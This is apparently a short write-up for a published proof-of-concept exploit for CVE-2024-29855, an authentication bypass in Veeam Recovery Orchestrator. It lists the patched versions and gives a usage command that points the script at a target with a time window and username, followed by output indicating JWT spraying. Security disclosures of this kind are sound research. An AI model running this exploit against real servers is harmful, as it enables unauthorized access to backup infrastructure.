CVE-2024-29855 Veeam Recovery Orchestrator Authentication Bypass (CVE-2024-29855) by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam) Technical Analysis A root cause analysis of the vulnerability can be found on my blog Summary Veeam published a CVSS 9 advisory for a authentication bypass vulnerability CVE-2024-29855 affecting Veeam Recovery Orchestrator, Following is my full analysis and exploit for this issue, although the issue is not as severe as it might sound (DO NOT PANIC AT ALL) but i found the mechanics of this vulnerability a bit interesting and decided to publish my detailed analysis and exploit for it. Vulnerable versions? According to Veeam official advisory, The vulnerability discussed was resolved starting in: Veeam Recovery Orchestrator 7.1.0.230 Veeam Recovery Orchestrator 7.0.0.379 Usage “` python CVE-2024-29855.py –start_time 1718264404 –end_time 1718264652 –username [email protected] –target https://192.168.253.180:9898/ _ _ _ _ _ _ __ _ __ _ _ _ _ _ | | | | | | | | | | | | | | | | | _ | |__ || | | | | || | | | | | | |_____| | _| |__ | _| |_| . | |____ | | | | | (*) Veeam Recovery Orchestrator Authentication Bypass (CVE-2024-29855) (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam) (*) Technical details: https://summoning.team/blog/veeam-recovery-Orchestrator-auth-bypass-CVE-2024-29855/ (INFO) Spraying JWT…Read More